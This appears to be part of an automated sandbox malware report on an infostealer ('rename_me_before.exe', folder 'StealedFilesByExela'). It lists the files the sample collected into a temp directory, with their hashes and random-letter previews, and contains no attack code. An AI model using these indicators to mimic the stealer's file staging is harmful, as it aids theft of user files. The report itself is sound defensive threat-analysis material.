                                                                                                                                                                                                                                                          Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\FENIVHOIKN.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                                          MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                                          SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                                          SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                                          SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\HTAGVDFUIE.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\HTAGVDFUIE.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                          MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                          SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                          SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                          SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\KATAXZVCPS.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                          MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                          SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                          SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                          SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\KZWFNRXYKI.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\KZWFNRXYKI.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\KZWFNRXYKI.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\LTKMYBSEYZ.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\LTKMYBSEYZ.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                          Malicious:false
